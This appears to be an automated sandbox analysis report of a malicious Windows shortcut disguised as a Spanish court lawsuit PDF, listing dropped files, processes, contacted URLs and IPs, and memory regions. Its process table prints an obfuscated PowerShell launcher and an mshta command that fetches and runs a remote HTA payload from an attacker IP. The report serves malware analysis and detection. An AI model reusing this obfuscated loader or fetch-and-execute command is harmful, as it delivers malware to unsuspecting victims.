Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
DEMANDA JUICIO JUZGADO01.pdf.lnk
|
MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=13, ctime=Sun Dec 31
23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
|
initial sample
|
 |
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0xbbb18c1f, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1cn0cqse.ejj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cibrx2n2.yuc.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VRVNTY32EM2YMY4GGXOO.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\c40edd991180589a.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $E='T:17S2zMhsAlcpo65y9tar4/.';
&(-join($E[(472-468),(979-969),(299-288)])) ^= (-join($E[(472-468),(979-969),(299-288)])); ^= *% (-join($E[(757-750),(472-468),(769-761),(-904+904),(979-969)]));
foreach($S in @((727-719),(-217+236),(-171+190),(387-374),(-940+941),(-632+655),(-622+645),(-144+162),(771-749),(-482+506),(-457+459),(691-675),(-573+595),(518-494),(-755+757),(-277+280),(262-257),(-797+821),(-706+708),(-556+571),(-847+862),(-704+727),(628-615),(308-296),(-217+223),(-338+357),(584-561),(763-742),(297-283),(-211+228),(677-660),(470-453),(-88+108),(-503+512),(-258+282),(194-186),(856-837),(-659+679))){$i+=$E[$S]};
*% $i;
|
|
|
|
C:\Windows\System32\mshta.exe
|
"C:\Windows\system32\mshta.exe" http://94.154.172.166/pczt/royyyas.hta
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://94.154
|
unknown
|
|
|
|
http://94.154.172.166/p
|
unknown
|
|
|
|
http://94.154.172.166/pcz
|
unknown
|
|
|
|
http://94.154.172.166/pczt/roy
|
unknown
|
|
|
|
http://94.154.172.166/pczt/royyyas.
|
unknown
|
|
|
|
http://94.154.
|
unknown
|
|
|
|
http://94.154.172.166/pczt/ro
|
unknown
|
|
|
|
http://94.154.172.166/pczt/royyyas.hta
|
94.154.172.166
|
|
|
|
http://94.154.17
|
unknown
|
|
|
|
http://94.154.1
|
unknown
|
|
|
|
http://94.154.172.
|
unknown
|
|
|
|
http://94.154.172.1
|
unknown
|
|
|
|
http://94.154.172.166/pczt/r
|
unknown
|
|
|
|
http://94.154.172
|
unknown
|
|
|
|
http://94.154.172.166/pczt/
|
unknown
|
|
|
|
http://94.154.172.166/pczt/royyy
|
unknown
|
|
|
|
http://94.154.172.166/
|
unknown
|
|
|
|
http://94.15
|
unknown
|
|
|
|
http://94.154.172.166/pczt
|
unknown
|
|
|
|
http://94.154.172.166/pc
|
unknown
|
|
|
|
http://94.154.172.166/pczt/royyyas.ht
|
unknown
|
|
|
|
http://94.154.172.16
|
unknown
|
|
|
|
http://94.154.172.166/pczt/royy
|
unknown
|
|
|
|
http://94.154.172.166/pczt/royyyas
|
unknown
|
|
|
|
http://94.154.172.166
|
unknown
|
|
|
|
http://94.154.172.166/pczt/royyyas.h
|
unknown
|
|
|
|
http://94.154.172.166/pczt/royyya
|
unknown
|
|
|
|
http://94.1
|
unknown
|
|
|
|
http://94.154.172.166/pczt/royyyas.htaC:
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2.C:
|
unknown
|
||
|
http://94.154.172.166/pczt/royyyas.hta_BROWSER_AP5;
|
unknown
|
||
|
http://94.154.172.166/pczt/royyyas.htata
|
unknown
|
||
|
http://94.154.172.166/pczt/royyyas.htaH
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://go.micros-
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
http://94.154.172.166/pczt/royyyas.hta5
|
unknown
|
||
|
http://94.154.172.166/pczt/royyyas.hta3
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://94.154.172.166/pczt/royyyas.hta...ory
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod/C:
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://94.154.172.166/pczt/royyyas.hta...
|
unknown
|
||
|
https://oneget.org
|
unknown
|
There are 44 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
bg.microsoft.map.fastly.net
|
199.232.214.172
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
94.154.172.166
|
unknown
|
Germany
|
|
|
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1D6B2C30000
|
trusted library allocation
|
page read and write
|
||
|
1D6ADFC4000
|
trusted library allocation
|
page read and write
|
||
|
256DAA00000
|
heap
|
page read and write
|
||
|
1760D015000
|
heap
|
page read and write
|
||
|
256DC9E1000
|
heap
|
page read and write
|
||
|
735E7E000
|
unkown
|
page readonly
|
||
|
1760C82B000
|
heap
|
page read and write
|
||
|
73647B000
|
stack
|
page read and write
|
||
|
1760D6A0000
|
trusted library allocation
|
page read and write
|
||
|
256DAA39000
|
heap
|
page read and write
|
||
|
B8E8DFE000
|
stack
|
page read and write
|
||
|
256DC530000
|
trusted library allocation
|
page read and write
|
||
|
1D6B0684000
|
heap
|
page read and write
|
||
|
17611CC0000
|
trusted library allocation
|
page read and write
|
||
|
D364F6000
|
stack
|
page read and write
|
||
|
17611E2D000
|
heap
|
page read and write
|
||
|
1760C800000
|
heap
|
page read and write
|
||
|
7FF848914000
|
trusted library allocation
|
page read and write
|
||
|
1D6B05FC000
|
heap
|
page read and write
|
||
|
1D6B05B2000
|
heap
|
page read and write
|
||
|
1760D11A000
|
heap
|
page read and write
|
||
|
1CEAC0E0000
|
heap
|
page read and write
|
||
|
256F4BF8000
|
heap
|
page read and write
|
||
|
256DCB80000
|
heap
|
page execute and read and write
|
||
|
17611EF2000
|
heap
|
page read and write
|
||
|
1CEAC3AB000
|
heap
|
page read and write
|
||
|
256F4CE7000
|
heap
|
page execute and read and write
|
||
|
735B7E000
|
unkown
|
page readonly
|
||
|
17611F04000
|
heap
|
page read and write
|
||
|
B8E907D000
|
stack
|
page read and write
|
||
|
17611E8D000
|
heap
|
page read and write
|
||
|
B8E933E000
|
stack
|
page read and write
|
||
|
1760D8D0000
|
trusted library section
|
page readonly
|
||
|
1D6AE4B2000
|
heap
|
page read and write
|
||
|
7FF8489C0000
|
trusted library allocation
|
page read and write
|
||
|
B8E9239000
|
stack
|
page read and write
|
||
|
1CEAC1C0000
|
heap
|
page read and write
|
||
|
256DCE03000
|
trusted library allocation
|
page read and write
|
||
|
7FF848B40000
|
trusted library allocation
|
page read and write
|
||
|
256DCC5B000
|
trusted library allocation
|
page read and write
|
||
|
256DAA9B000
|
heap
|
page read and write
|
||
|
1760D8A0000
|
trusted library section
|
page readonly
|
||
|
256ECD87000
|
trusted library allocation
|
page read and write
|
||
|
1CEAC393000
|
heap
|
page read and write
|
||
|
73737E000
|
unkown
|
page readonly
|
||
|
1D6AE4C9000
|
heap
|
page read and write
|
||
|
B8E8EFF000
|
stack
|
page read and write
|
||
|
1760D113000
|
heap
|
page read and write
|
||
|
256F4C34000
|
heap
|
page read and write
|
||
|
1760C8FE000
|
heap
|
page read and write
|
||
|
B8E92B9000
|
stack
|
page read and write
|
||
|
1D6ADF9C000
|
trusted library allocation
|
page read and write
|
||
|
1D6AE4C9000
|
heap
|
page read and write
|
||
|
1760D002000
|
heap
|
page read and write
|
||
|
1760C6C0000
|
heap
|
page read and write
|
||
|
73557E000
|
unkown
|
page readonly
|
||
|
B8E8D7D000
|
stack
|
page read and write
|
||
|
73587C000
|
stack
|
page read and write
|
||
|
1D6ADFAC000
|
trusted library allocation
|
page read and write
|
||
|
1CEAC3AD000
|
heap
|
page read and write
|
||
|
256DC5B5000
|
heap
|
page read and write
|
||
|
1760D540000
|
trusted library allocation
|
page read and write
|
||
|
1D6B05BC000
|
heap
|
page read and write
|
||
|
1D6AE034000
|
trusted library allocation
|
page read and write
|
||
|
7FF848B10000
|
trusted library allocation
|
page read and write
|
||
|
73657E000
|
unkown
|
page readonly
|
||
|
256DE8C3000
|
trusted library allocation
|
page read and write
|
||
|
17611DC0000
|
trusted library allocation
|
page read and write
|
||
|
17611C80000
|
trusted library allocation
|
page read and write
|
||
|
1D6B05DD000
|
heap
|
page read and write
|
||
|
1D6B2C00000
|
trusted library allocation
|
page read and write
|
||
|
1D6AE4C1000
|
heap
|
page read and write
|
||
|
1D6AE470000
|
heap
|
page read and write
|
||
|
1760C87C000
|
heap
|
page read and write
|
||
|
1D6ADFB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C70000
|
trusted library allocation
|
page read and write
|
||
|
17612020000
|
remote allocation
|
page read and write
|
||
|
1760D890000
|
trusted library section
|
page readonly
|
||
|
7DF4CEEA0000
|
trusted library allocation
|
page readonly
|
||
|
17611CF3000
|
trusted library allocation
|
page read and write
|
||
|
1D6ADEB6000
|
heap
|
page read and write
|
||
|
1D6AE4D7000
|
heap
|
page read and write
|
||
|
1760C929000
|
heap
|
page read and write
|
||
|
256DC933000
|
trusted library allocation
|
page read and write
|
||
|
1D6B2C10000
|
heap
|
page readonly
|
||
|
17611D50000
|
trusted library allocation
|
page read and write
|
||
|
7FF848BC0000
|
trusted library allocation
|
page read and write
|
||
|
735FFE000
|
stack
|
page read and write
|
||
|
1D6B2BA0000
|
heap
|
page read and write
|
||
|
256DA9A0000
|
heap
|
page read and write
|
||
|
1D6ADFE0000
|
trusted library allocation
|
page read and write
|
||
|
1CEAC39B000
|
heap
|
page read and write
|
||
|
256F4CF0000
|
heap
|
page read and write
|
||
|
256DCBC0000
|
heap
|
page execute and read and write
|
||
|
256ECBD1000
|
trusted library allocation
|
page read and write
|
||
|
256DE57C000
|
trusted library allocation
|
page read and write
|
||
|
1CEAC270000
|
trusted library allocation
|
page read and write
|
||
|
1D6ADEA9000
|
heap
|
page read and write
|
||
|
256DD0EB000
|
trusted library allocation
|
page read and write
|
||
|
17611E41000
|
heap
|
page read and write
|
||
|
256DE7FE000
|
trusted library allocation
|
page read and write
|
||
|
D36F4E000
|
stack
|
page read and write
|
||
|
17611E58000
|
heap
|
page read and write
|
||
|
B8E90F8000
|
stack
|
page read and write
|
||
|
256F4C53000
|
heap
|
page read and write
|
||
|
1760C89E000
|
heap
|
page read and write
|
||
|
1CEAC250000
|
heap
|
page read and write
|
||
|
B8E953C000
|
stack
|
page read and write
|
||
|
1760D8B0000
|
trusted library section
|
page readonly
|
||
|
7FF848AC1000
|
trusted library allocation
|
page read and write
|
||
|
7FF848BF0000
|
trusted library allocation
|
page read and write
|
||
|
736B7E000
|
unkown
|
page readonly
|
||
|
7FF848BB0000
|
trusted library allocation
|
page read and write
|
||
|
D36B4E000
|
stack
|
page read and write
|
||
|
735EFE000
|
stack
|
page read and write
|
||
|
1D6B2C20000
|
trusted library allocation
|
page read and write
|
||
|
B8E8F7E000
|
stack
|
page read and write
|
||
|
7FF848BE0000
|
trusted library allocation
|
page read and write
|
||
|
256DA980000
|
heap
|
page read and write
|
||
|
1D6ADE90000
|
heap
|
page read and write
|
||
|
1CEAC2D7000
|
heap
|
page read and write
|
||
|
B8E8E7B000
|
stack
|
page read and write
|
||
|
1D6AE274000
|
heap
|
page read and write
|
||
|
17613000000
|
heap
|
page read and write
|
||
|
73607E000
|
unkown
|
page readonly
|
||
|
17611CC4000
|
trusted library allocation
|
page read and write
|
||
|
735A79000
|
stack
|
page read and write
|
||
|
73627E000
|
unkown
|
page readonly
|
||
|
1D6AE49F000
|
heap
|
page read and write
|
||
|
1D6AE044000
|
trusted library allocation
|
page read and write
|
||
|
256F4E15000
|
heap
|
page read and write
|
||
|
7FF848B50000
|
trusted library allocation
|
page read and write
|
||
|
1D6ADFA0000
|
trusted library allocation
|
page read and write
|
||
|
B8E8C7E000
|
stack
|
page read and write
|
||
|
1D6AE4C9000
|
heap
|
page read and write
|
||
|
1D6AE4C1000
|
heap
|
page read and write
|
||
|
1D6B05C0000
|
heap
|
page read and write
|
||
|
17611E00000
|
heap
|
page read and write
|
||
|
B8E913E000
|
stack
|
page read and write
|
||
|
1D6ADFD8000
|
trusted library allocation
|
page read and write
|
||
|
1CEAC294000
|
heap
|
page read and write
|
||
|
17611C80000
|
trusted library allocation
|
page read and write
|
||
|
1D6ADFD4000
|
trusted library allocation
|
page read and write
|
||
|
735F7E000
|
unkown
|
page readonly
|
||
|
7FF848AE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1760C872000
|
heap
|
page read and write
|
||
|
1D6ADEAE000
|
heap
|
page read and write
|
||
|
7FF848A30000
|
trusted library allocation
|
page execute and read and write
|
||
|
17611D60000
|
trusted library allocation
|
page read and write
|
||
|
1760D102000
|
heap
|
page read and write
|
||
|
1D6B05B0000
|
heap
|
page read and write
|
||
|
7FF848AD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D6B2C23000
|
trusted library allocation
|
page read and write
|
||
|
17611C60000
|
trusted library allocation
|
page read and write
|
||
|
1D6AE4C2000
|
heap
|
page read and write
|
||
|
1760C822000
|
heap
|
page read and write
|
||
|
1760D000000
|
heap
|
page read and write
|
||
|
1D6ADFA8000
|
trusted library allocation
|
page read and write
|
||
|
1760C902000
|
heap
|
page read and write
|
||
|
7367FE000
|
stack
|
page read and write
|
||
|
1D6AE000000
|
trusted library allocation
|
page read and write
|
||
|
7368FE000
|
unkown
|
page readonly
|
||
|
256DC570000
|
heap
|
page readonly
|
||
|
256F4CB6000
|
heap
|
page read and write
|
||
|
1760C7D0000
|
trusted library allocation
|
page read and write
|
||
|
1D6ADFE4000
|
trusted library allocation
|
page read and write
|
||
|
256DE4F6000
|
trusted library allocation
|
page read and write
|
||
|
17611E10000
|
heap
|
page read and write
|
||
|
7362FE000
|
stack
|
page read and write
|
||
|
1760DC30000
|
trusted library allocation
|
page read and write
|
||
|
256F4C09000
|
heap
|
page read and write
|
||
|
1D6AE480000
|
heap
|
page read and write
|
||
|
7FF848BA0000
|
trusted library allocation
|
page read and write
|
||
|
73567E000
|
stack
|
page read and write
|
||
|
256F4DF0000
|
heap
|
page read and write
|
||
|
256DACC5000
|
heap
|
page read and write
|
||
|
1D6ADEB2000
|
heap
|
page read and write
|
||
|
736C7A000
|
stack
|
page read and write
|
||
|
256DAADF000
|
heap
|
page read and write
|
||
|
1760CFF0000
|
trusted library allocation
|
page read and write
|
||
|
1D6B067F000
|
heap
|
page read and write
|
||
|
1CEAC290000
|
heap
|
page read and write
|
||
|
256DA970000
|
heap
|
page read and write
|
||
|
256DAAE5000
|
heap
|
page read and write
|
||
|
7FF848C20000
|
trusted library allocation
|
page read and write
|
||
|
17611CB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848B70000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C30000
|
trusted library allocation
|
page read and write
|
||
|
17611EE5000
|
heap
|
page read and write
|
||
|
1CEAC326000
|
heap
|
page read and write
|
||
|
256DAA9F000
|
heap
|
page read and write
|
||
|
17611CF0000
|
trusted library allocation
|
page read and write
|
||
|
1D6ADF98000
|
trusted library allocation
|
page read and write
|
||
|
256DCBD1000
|
trusted library allocation
|
page read and write
|
||
|
1760D11A000
|
heap
|
page read and write
|
||
|
7FF848B20000
|
trusted library allocation
|
page read and write
|
||
|
734ECB000
|
stack
|
page read and write
|
||
|
1D6AE01C000
|
trusted library allocation
|
page read and write
|
||
|
1760C894000
|
heap
|
page read and write
|
||
|
7FF848B30000
|
trusted library allocation
|
page read and write
|
||
|
256F4C13000
|
heap
|
page read and write
|
||
|
1760C879000
|
heap
|
page read and write
|
||
|
7FF848920000
|
trusted library allocation
|
page read and write
|
||
|
7DF4CEEA1000
|
trusted library allocation
|
page execute read
|
||
|
7FF848AF2000
|
trusted library allocation
|
page read and write
|
||
|
17611E61000
|
heap
|
page read and write
|
||
|
B8E89C5000
|
stack
|
page read and write
|
||
|
1D6AE018000
|
trusted library allocation
|
page read and write
|
||
|
D36A4F000
|
stack
|
page read and write
|
||
|
17611EF6000
|
heap
|
page read and write
|
||
|
1D6ADFDC000
|
trusted library allocation
|
page read and write
|
||
|
1CEAC24E000
|
heap
|
page read and write
|
||
|
1D6B060C000
|
heap
|
page read and write
|
||
|
17611DD0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C10000
|
trusted library allocation
|
page read and write
|
||
|
1760C7A0000
|
heap
|
page read and write
|
||
|
73597E000
|
unkown
|
page readonly
|
||
|
B8E9F0E000
|
stack
|
page read and write
|
||
|
1D6B0688000
|
heap
|
page read and write
|
||
|
73577E000
|
unkown
|
page readonly
|
||
|
7FF8489F6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848930000
|
trusted library allocation
|
page read and write
|
||
|
1D6B05BA000
|
heap
|
page read and write
|
||
|
D36D4F000
|
stack
|
page read and write
|
||
|
1D6ADFD0000
|
trusted library allocation
|
page read and write
|
||
|
1760D100000
|
heap
|
page read and write
|
||
|
7FF848C50000
|
trusted library allocation
|
page read and write
|
||
|
7361FE000
|
stack
|
page read and write
|
||
|
73697E000
|
unkown
|
page readonly
|
||
|
256DDAEB000
|
trusted library allocation
|
page read and write
|
||
|
1D6B29A0000
|
heap
|
page read and write
|
||
|
256DC560000
|
trusted library allocation
|
page read and write
|
||
|
17611CA0000
|
trusted library allocation
|
page read and write
|
||
|
1CEAC2B0000
|
heap
|
page read and write
|
||
|
D36E4D000
|
stack
|
page read and write
|
||
|
1D6ADFF8000
|
trusted library allocation
|
page read and write
|
||
|
1D6ADFC0000
|
trusted library allocation
|
page read and write
|
||
|
256DC9D0000
|
heap
|
page read and write
|
||
|
17611E4E000
|
heap
|
page read and write
|
||
|
B8E8CFE000
|
stack
|
page read and write
|
||
|
D3674E000
|
stack
|
page read and write
|
||
|
17611E20000
|
heap
|
page read and write
|
||
|
7FF848AB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848912000
|
trusted library allocation
|
page read and write
|
||
|
7FF848B90000
|
trusted library allocation
|
page read and write
|
||
|
1760D201000
|
trusted library allocation
|
page read and write
|
||
|
736D7E000
|
unkown
|
page readonly
|
||
|
1CEAC366000
|
heap
|
page read and write
|
||
|
735C7B000
|
stack
|
page read and write
|
||
|
256DC930000
|
trusted library allocation
|
page read and write
|
||
|
1760D7B0000
|
trusted library allocation
|
page read and write
|
||
|
1CEAC2B8000
|
heap
|
page read and write
|
||
|
1D6B05F6000
|
heap
|
page read and write
|
||
|
7FF848B00000
|
trusted library allocation
|
page execute and read and write
|
||
|
1760C6A0000
|
heap
|
page read and write
|
||
|
73637E000
|
unkown
|
page readonly
|
||
|
736A7E000
|
stack
|
page read and write
|
||
|
17611EBE000
|
heap
|
page read and write
|
||
|
1CEAC356000
|
heap
|
page read and write
|
||
|
7FF848BD0000
|
trusted library allocation
|
page read and write
|
||
|
1D6AE4B9000
|
heap
|
page read and write
|
||
|
1CEAC29D000
|
heap
|
page read and write
|
||
|
D3684B000
|
stack
|
page read and write
|
||
|
1760C88D000
|
heap
|
page read and write
|
||
|
1D6AE4CC000
|
heap
|
page read and write
|
||
|
1D6B2092000
|
trusted library allocation
|
page read and write
|
||
|
17611C70000
|
trusted library allocation
|
page read and write
|
||
|
17611EEB000
|
heap
|
page read and write
|
||
|
1760C913000
|
heap
|
page read and write
|
||
|
1CEAC389000
|
heap
|
page read and write
|
||
|
256DE8C7000
|
trusted library allocation
|
page read and write
|
||
|
1760C877000
|
heap
|
page read and write
|
||
|
7FF84892B000
|
trusted library allocation
|
page read and write
|
||
|
17611EB7000
|
heap
|
page read and write
|
||
|
7FF848C40000
|
trusted library allocation
|
page read and write
|
||
|
7DF42F590000
|
trusted library allocation
|
page execute and read and write
|
||
|
1760D8C0000
|
trusted library section
|
page readonly
|
||
|
256F4CE0000
|
heap
|
page execute and read and write
|
||
|
1CEAC386000
|
heap
|
page read and write
|
||
|
7FF848913000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D6B06B0000
|
trusted library section
|
page readonly
|
||
|
B8E94BF000
|
stack
|
page read and write
|
||
|
17612020000
|
remote allocation
|
page read and write
|
||
|
1D6AE270000
|
heap
|
page read and write
|
||
|
735D7E000
|
unkown
|
page readonly
|
||
|
1D6AE038000
|
trusted library allocation
|
page read and write
|
||
|
D3694E000
|
stack
|
page read and write
|
||
|
1D6ADFC8000
|
trusted library allocation
|
page read and write
|
||
|
256DA9E0000
|
heap
|
page read and write
|
||
|
1D6AE4C9000
|
heap
|
page read and write
|
||
|
1CEAC244000
|
heap
|
page read and write
|
||
|
1D6B060E000
|
heap
|
page read and write
|
||
|
B8E93BE000
|
stack
|
page read and write
|
||
|
256DAA9D000
|
heap
|
page read and write
|
||
|
1D6AE028000
|
trusted library allocation
|
page read and write
|
||
|
256DE521000
|
trusted library allocation
|
page read and write
|
||
|
B8E91B6000
|
stack
|
page read and write
|
||
|
1D6AE4C1000
|
heap
|
page read and write
|
||
|
1D6AE008000
|
trusted library allocation
|
page read and write
|
||
|
256DABD0000
|
heap
|
page read and write
|
||
|
256ECC44000
|
trusted library allocation
|
page read and write
|
||
|
1CEAC240000
|
heap
|
page read and write
|
||
|
256DAAB7000
|
heap
|
page read and write
|
||
|
7FF8489D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
256DC580000
|
trusted library allocation
|
page read and write
|
||
|
17611E54000
|
heap
|
page read and write
|
||
|
7365FE000
|
stack
|
page read and write
|
||
|
17611CB0000
|
trusted library allocation
|
page read and write
|
||
|
B8E8FFE000
|
stack
|
page read and write
|
||
|
1760C85C000
|
heap
|
page read and write
|
||
|
1CEAC3A3000
|
heap
|
page read and write
|
||
|
1760C813000
|
heap
|
page read and write
|
||
|
1D6ADFB4000
|
trusted library allocation
|
page read and write
|
||
|
256DACC0000
|
heap
|
page read and write
|
||
|
1760CFC1000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C60000
|
trusted library allocation
|
page read and write
|
||
|
17611C81000
|
trusted library allocation
|
page read and write
|
||
|
17612020000
|
remote allocation
|
page read and write
|
||
|
1D6ADE94000
|
heap
|
page read and write
|
||
|
256DC5B0000
|
heap
|
page read and write
|
||
|
1D6ADFF0000
|
trusted library allocation
|
page read and write
|
||
|
1D6ADFBC000
|
trusted library allocation
|
page read and write
|
||
|
17611D50000
|
trusted library allocation
|
page read and write
|
||
|
1760C843000
|
heap
|
page read and write
|
||
|
1D6ADFE9000
|
trusted library allocation
|
page read and write
|
||
|
7372FE000
|
stack
|
page read and write
|
||
|
256F4C55000
|
heap
|
page read and write
|
||
|
256DE2DF000
|
trusted library allocation
|
page read and write
|
||
|
B8E943E000
|
stack
|
page read and write
|
||
|
1CEAC1E0000
|
heap
|
page read and write
|
||
|
256F4D14000
|
heap
|
page read and write
|
||
|
1CEAC39D000
|
heap
|
page read and write
|
||
|
7FF848C00000
|
trusted library allocation
|
page read and write
|
||
|
735477000
|
stack
|
page read and write
|
||
|
256ECBE0000
|
trusted library allocation
|
page read and write
|
||
|
256DAA09000
|
heap
|
page read and write
|
||
|
7FF848B60000
|
trusted library allocation
|
page read and write
|
||
|
1D6AE4E3000
|
heap
|
page read and write
|
||
|
7FF8489CC000
|
trusted library allocation
|
page execute and read and write
|
||
|
256F4BD0000
|
heap
|
page read and write
|
||
|
1760D8E0000
|
trusted library section
|
page readonly
|
||
|
256F4CB4000
|
heap
|
page read and write
|
||
|
17611DE0000
|
trusted library allocation
|
page read and write
|
||
|
1D6AE010000
|
trusted library allocation
|
page read and write
|
||
|
1760C88F000
|
heap
|
page read and write
|
||
|
1D6B29D4000
|
heap
|
page read and write
|
||
|
D36C4F000
|
stack
|
page read and write
|
||
|
1760C8B0000
|
heap
|
page read and write
|
||
|
D3704B000
|
stack
|
page read and write
|
||
|
256DAA97000
|
heap
|
page read and write
|
||
|
17611DB0000
|
trusted library allocation
|
page read and write
|
||
|
735DFE000
|
stack
|
page read and write
|
||
|
7FF84891D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848ACA000
|
trusted library allocation
|
page read and write
|
||
|
1D6B05B6000
|
heap
|
page read and write
|
||
|
1D6B2C00000
|
trusted library allocation
|
page read and write
|
||
|
1D6AE4B6000
|
heap
|
page read and write
|
||
|
1760C7E0000
|
trusted library section
|
page read and write
|
||
|
1CEAC375000
|
heap
|
page read and write
|
||
|
1D6AE048000
|
trusted library allocation
|
page read and write
|
||
|
1CEAC260000
|
trusted library allocation
|
page read and write
|
||
|
17611F02000
|
heap
|
page read and write
|
||
|
73677E000
|
stack
|
page read and write
|
||
|
73667E000
|
unkown
|
page readonly
|
||
|
256F4D11000
|
heap
|
page read and write
|
||
|
1D6AE4C3000
|
heap
|
page read and write
|
||
|
7FF8489C6000
|
trusted library allocation
|
page read and write
|
||
|
17611DD0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848B80000
|
trusted library allocation
|
page read and write
|
||
|
7DF4CEEB1000
|
trusted library allocation
|
page execute read
|
||
|
256F4CAC000
|
heap
|
page read and write
|
||
|
1CEAC3A9000
|
heap
|
page read and write
|
||
|
1D6AE4E2000
|
heap
|
page read and write
|
||
|
1D6AE180000
|
heap
|
page read and write
|
There are 364 hidden memdumps, click here to show them.